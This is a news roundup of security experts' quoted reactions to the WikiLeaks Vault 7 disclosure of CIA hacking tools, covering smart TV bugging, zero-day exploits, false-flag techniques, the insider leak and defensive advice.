According to the recent Wikileaks documents, British spy agencies worked with the CIA to turn televisions and smart phones into bugging devices that can record conversations and even take photographs. IT security experts from Tripwire, FireMon, Vectra Networks, Core Security, Pushfor, Cylance, Varonis, Synopsys, Comapritech.com, Sentinelone, Balabit and Avast commented below.
Craig Young, Security Researcher at Tripwire:
“If the reports are correct that intelligence agencies have developed the capability to deploy hacked firmware to a TV through a USB update process, it is also reasonable to believe that this technique could be extended to subvert the firmware update process over the Internet. Doing this however would require control over the network path between TVs and their update servers as well as having trusted security certificates. The security certificates would likely either need to be stolen from the vendor or fraudulently obtained from a trusted certification authority (CA).
End-users should recognize that there is always an inherent risk from connected devices having cameras or microphones as long as they are plugged in. Specifically, with Smart TVs, it is important to remember that pressing the power button is typically not going to perform a full power down as the device needs to receive signals from a remote control. This type of privacy issue is going to be increasingly important with the growing number of voice-first devices like Amazon Echo and Google Home. Consumers need to recognize that the only way to make certain that the device is not recording audio is to physically unplug them rather than simply pressing the mute button. Similar to how hackers have demonstrated the capability of activating web cams without turning on an indicator light, there is no guarantee that software on these devices is actually disabling the microphone.”
Paul Calatayud, CTO at FireMon:
“It’s somewhat common for zero day type exploits to be closely guarded by those who wrote them. Exploits hold value. As those exploits are used and thus discovered by defenders, they quickly lose value. Chances are, if these exploits are released, we will have a mix of ones that are now patched as well as others that are known and less valuable. The small amount that are still zero day will cause harm, but no more harm than the current level of thousands of exploits being written daily.”
Gunter Ollmann, CSO at Vectra Networks:
(1) The CIA’s “UMBRAGE” programme reveals the importance placed upon “false flag” signatures used in clandestine operations. It should be no surprise to the InfoSec community that such resources are expended to capture and duplicate the techniques used by foreign agencies and criminal organisations. It does however reinforce that the use of such techniques is in fact an everyday part of clandestine operational procedure – casting further doubt on public attribution disclosures – especially those quickly released and promoted by the marketing teams of commercial security vendors.
(2) As the tools and code are eventually released (by Wikileaks or accidently) it is guaranteed that they will be used worldwide within 48 hours of disclosure. By the time a business has read of the tool release in the news, they will have less than 24 hours to respond to the released threat. Since there appears to be a substantial number of “zero day” exploits – each of which may take weeks for vendors to investigate and provide fixes for, it is critical that organisations take preemptive steps to “dial up to 11” their anomaly threat detection systems and have their threat hunting teams working diligently pouncing on any new anomalies – with a perspective of zero-day exploits and false-flag malware attribution trails.
(3) The public disclosures of zero-days and attack tools for Samsung TVs and webcams will be very popular to all hackers – both criminal and hobbyists. Businesses that employ such technologies within their offices should preemptively be taking steps to selectively disable such video and sound capturing capabilities when not specifically needed for business operations. This may entail using electrical tape to cover TV video lens, physically disabling microphones when not in use, etc. Going in to the device administration settings and disabling video and audio functions are highly unlikely to be effective – as any hacks against such devices can easily bypass or present false configuration settings to the admin and user interfaces on the device.
Willis McDonald, Senior Threat Manager at Core Security:
“The leaked CIA documents have potentially disastrous effects on ongoing CIA operations. If the tools detailed in the documents are still in use this now gives clues to targeted organizations as to what is of interest to the CIA. As a consequence this could also expose close contact human intelligence (HUMINT) operations leading to incarceration and possible harm to operatives.
The leak of these documents definitely has caused financial harm to the CIA. Response to the leak of the documents will require a massive research and retooling effort in the CIA. Everything from tradecraft to tools will need to be changed in order for operations to continue undetected which will cost millions of dollars and months of training and development.”
John Safa, Security Expert and Founder at Pushfor:
“The real issue here isn’t that the CIA spies on people, or even how they do it. The issue is that source code for these hacking tools has been leaked and is available to anyone who wants to use it. Criminals and hackers have access to the hacking power of the CIA.
“It’s not enough to encrypt data in transit. Using the CIA methods, it can be stolen at the device level, before it gets encrypted. Thus making the new security improvements in WhatsApp easy to bypass.
“So many companies rely on free communications tools such as WhatsApp which use the public cloud. They are at risk and and these free messaging apps should be banned for corporate use. They need to take back control of their own data environments and secure data in a walled garden where they have more control.
“It’s similar to the Sony DRM Rootkit scandal that happened 12 years ago. The unintended consequence of Sony putting copy protection software on its CDs was that it created a massive backdoor for hackers to access and plant malware on PCs. The same will happen now. Ostensibly, the CIA uses hacking tools to prevent terrorism and crime. But the leaking of the source code for these tools, they’re opening the tools up to hackers and criminals.
“The ramifications of this are massive. It opens companies up to crime, data theft and corporate espionage.
“I find it fascinating that Deutsche Bank had banned corporate use of free messaging apps like WhatsApp just weeks ago. They’re looking pretty smart for doing that now.”
Jim Walter, Senior Researcher at Cylance:
“There are clear instances where the owner of this code is inspired by (and sometimes borrowing directly from) well-known malware. Familiar names like HiKit, Shamoon, and Nuclear EP appear multiple times, so it is interesting to see what threats the owner is taking cues from. Beyond that we have a great deal of analysis to do when it comes to putting this dataset into context with previous dumps pertaining to government techniques, tactics, and procedures.”
Brian Vecci, Technical Evangelist at Varonis:
“It’s too easy for data to be stolen, even—allegedly—within the CIA’s Center for Cyber Intelligence. The entire concept of a spook is to be covert and undetectable; apparently that also applies to actions on their own network. According to WikiLeaks, this treasure trove of files was given to them by a former U.S. government contractor. The CIA is not immune to issues affecting many organizations: too much access with too little oversight and detective controls. A recent Forrester study found that 59% of organizations do not restrict access to files on a need to know basis.
“In performing forensics on the actual breach, the important examination is to determine how 8,761 files just walked out of one of the most secretive and confidential organizations in the world. Files that were once useful in their operations are suddenly lethal to those same operations. We call this toxic data, anything that is useful and valuable to an organization but once stole and made public turns toxic to its bottom line and reputation. All you have to do is look at Sony, Mossack Fonseca and the DNC to see the effects of this toxic data conversion.
“Organizations need to get a grip on where their information assets are, who is using them, and who is responsible for them. There are just too many unknowns right now. They need to put all that data lying around in the right place, restrict access to it and monitor and analyze who is using it.”
Lee Munson, Security Researcher at Comapritech.com:
“Wikileaks’ disclosure of what it claims are wide-ranging CIA hacking tools is hardly likely to surprise anyone in the post-Snowden world we now live in.
“Whether the alleged cyber weapons exist or not is largely immaterial at a time when I assume most people believe they do.
“What the Vault 7 leaks should do, however, is confirm that, while taking a nothing to hide, nothing to fear approach is hopelessly out of date, most citizens should not be any more concerned about surveillance today than they were yesterday.
“While exploits across a range of devices and the ability to turn on cameras and microphones is a touch chilling, they’re nothing new, and anyone with real concerns should already be going about their business with those possibilities in mind.
“The really interesting aspect to this leak, however, is how the alleged cyber spying tools all appear to have one thing in common – the need to acquire information over the wire.
“That means, for now at least, we can assume that messaging systems with strong end-to-end encryption are beyond the reaches of the security services; a win for everyone who is truly concerned about protecting their privacy today.”
Andy Norton, Risk Officer – EMEA at Sentinelone:
“What’s interesting here, is the strategy in use. Clearly a lot of effort has gone into remaining unseen, it gives us great insight into how the most sophisticated cyber attackers operate, including do´s and don´t guidelines for implanting systems, and rationale behind choosing certain methods of attack, including the rickybobby implant, which is powershell based, because, RickyBobby uses Windows PowerShell to download and dynamically execute the .NET DLLs in memory.
OSB chose Windows PowerShell as the execution vector because it is installed by default on all Microsoft’s operating systems since Windows Vista and it runs as trusted, Microsoft-signed process. RickyBobby 4.x can be installed remotely or with physical access to the target computers using batch files. This underlines the trend towards ¨fileless¨ attacks as strategies developed at this level filter down to a broader threat”
Matthew Ravden, VP at Balabit:
“Assuming these revelations are true (and they certainly appear to be authentic), it’s probably fairly shocking to the general public to see the lengths to which a sophisticated government-sponsored organisation will go to find ways of ‘listening in’, through TVs, smart-phones or other ‘connected’ devices. For those of us in the security industry, however, none of this is particularly surprising. The resources available to the CIA, MI5, or the FSB are such that they can do pretty much anything. They live by a different set of rules from the rest of us.
Perhaps the greatest irony here, then, is that despite all their technology might, the CIA is unable to properly monitor its own staff. They can hack Samsung TVs but can’t spot an unusual server access or abnormal data dump. It’s well known that an organisation’s so-called ‘privileged users’ are its greatest vulnerability, and it only takes one individual with the requisite ‘clearance’ to cause this kind of mayhem. Clearly the lessons from the Snowden affair have not been heeded, and better monitoring and analytics technology is needed to stop these leaks from happening. For once, we in the commercial sector can feel slightly smug.”
Sinan Eren, VP at Avast:
“What this news shows – and what security vendors and professionals need to scream out loud – is that today’s mobile platforms make it almost impossible to detect cybercriminals once they’ve broken in. Any embedded device will remain a great target because it presents a significant return on investment to hackers and nation-state actors. Even though compromising mobile systems and smart devices takes significant financial investment and manpower to do so, once cybercriminals are in, they’ll likely get several years use out of their malicious toolkits before they’re detected. We need open APIs and the ability to drive a paradigm shift where mobile platforms don’t shut out access to security vendors – if we can get access to their black box, we’ll be better able to detect when hackers are hiding in a mobile OS.”